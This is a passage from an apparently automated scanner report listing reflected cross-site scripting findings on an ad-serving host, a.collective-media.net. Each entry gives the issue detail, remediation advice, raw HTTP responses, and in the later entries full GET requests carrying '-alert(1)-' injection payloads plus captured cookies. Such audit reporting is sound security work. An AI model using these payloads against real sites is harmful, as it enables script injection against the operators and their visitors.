The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f781'-alert(1)-'4331bbafcf8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 448 Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e706b'-alert(1)-'511fd1c4838 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 448 Date: Sat, 29 Jan 2011 01:54:34 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:34 GMT
4.27. http://a.collective-media.net/adj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.bosherald/be_ent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6398d'-alert(1)-'eda95b2ec1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 451 Date: Sat, 29 Jan 2011 01:54:31 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:31 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116e0'-alert(1)-'9df7232d930 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 448 Date: Sat, 29 Jan 2011 01:54:25 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc375'-alert(1)-'1c213697142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 451 Date: Sat, 29 Jan 2011 01:54:30 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:30 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c4bd'-alert(1)-'a4282fd2012 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 451 Date: Sat, 29 Jan 2011 01:54:32 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:32 GMT
4.31. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.bosherald/be_ent_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55cd8'-alert(1)-'c6144a53fa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 454 Date: Sat, 29 Jan 2011 01:54:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:29 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c05fc'-alert(1)-'9211df7f8cc was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 451 Date: Sat, 29 Jan 2011 01:54:23 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:23 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 654f4'-alert(1)-'850b1958677 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 444 Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cab70'-alert(1)-'8ffc3938199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 444 Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT
4.35. http://a.collective-media.net/adj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.bosherald/ent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 657e3'-alert(1)-'1fd645b8ca3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 447 Date: Sat, 29 Jan 2011 01:54:30 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:30 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f510'-alert(1)-'cca529e904d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 444 Date: Sat, 29 Jan 2011 01:54:25 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9722d'-alert(1)-'1ce6f168cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 446 Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d8b5'-alert(1)-'bb4b3c0ab17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 447 Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT
4.39. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.bosherald/ent_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45fdb'-alert(1)-'f0e9ee952a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 450 Date: Sat, 29 Jan 2011 01:54:30 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:30 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79143'-alert(1)-'f2c049340a8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 447 Date: Sat, 29 Jan 2011 01:54:25 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 664cf'-alert(1)-'481295f49c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 479 Date: Sat, 29 Jan 2011 01:54:36 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:36 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d2bf'-alert(1)-'4f7eb27d456 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 479 Date: Sat, 29 Jan 2011 01:54:36 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:36 GMT
The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfb42'-alert(1)-'55062673759 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 480 Date: Sat, 29 Jan 2011 01:54:26 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:26 GMT
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cce9e'-alert(1)-'f72cf659efc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 483 Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de957'-alert(1)-'86a9ffedd71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadjde957'-alert(1)-'86a9ffedd71/bzo.847.CD39C435/ATF;sz=728x90;net=bzo;ord=1296226792127; HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7406 Date: Fri, 28 Jan 2011 16:37:20 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-86809834_1296232640","http://ad.doubleclick.net/adjde957'-alert(1)-'86a9ffedd71/bzo.847.CD39C435/ATF;net=bzo;u=,bzo-86809834_1296232640,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;cmw=nur ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ae7'-alert(1)-'f6babba3ff1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/bzo.847.CD39C43579ae7'-alert(1)-'f6babba3ff1/ATF HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Date: Fri, 28 Jan 2011 16:37:19 GMT Content-Length: 7355 Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-23828810_1296232639","http://ad.doubleclick.net//bzo.847.CD39C43579ae7'-alert(1)-'f6babba3ff1/ATF;net=bzo;u=,bzo-23828810_1296232639,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo. ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28bed'-alert(1)-'6aa23ec8461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/bzo.847.CD39C435/ATF28bed'-alert(1)-'6aa23ec8461 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7355 Date: Fri, 28 Jan 2011 16:37:20 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-67058863_1296232640","http://ad.doubleclick.net//bzo.847.CD39C435/ATF28bed'-alert(1)-'6aa23ec8461;net=bzo;u=,bzo-67058863_1296232640,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo.spor ...[SNIP]...
4.48. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/bzo.847.CD39C435/ATF
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdbf4'-alert(1)-'424982c1ee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/bzo.847.CD39C435/ATF?bdbf4'-alert(1)-'424982c1ee6=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7358 Date: Fri, 28 Jan 2011 16:37:18 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-18342662_1296232638","http://ad.doubleclick.net//bzo.847.CD39C435/ATF?bdbf4'-alert(1)-'424982c1ee6=1;net=bzo;u=,bzo-18342662_1296232638,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo.sp ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ff88'-alert(1)-'0d4cdd2d236 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/bzo.847.CD39C435/ATF;sz=3ff88'-alert(1)-'0d4cdd2d236 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Fri, 28 Jan 2011 16:37:18 GMT Connection: close Content-Length: 7388
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... /adj/bzo.847.CD39C435/ATF;net=bzo;u=,bzo-77437619_1296232638,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;sz=3ff88'-alert(1)-'0d4cdd2d236;contx=none;dc=w;btg=bzo.sports_l;btg=bzo.c9q;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l?","3ff88'-alert(1)-'0d4cd ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c29a3'-alert(1)-'a7c73f96421 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
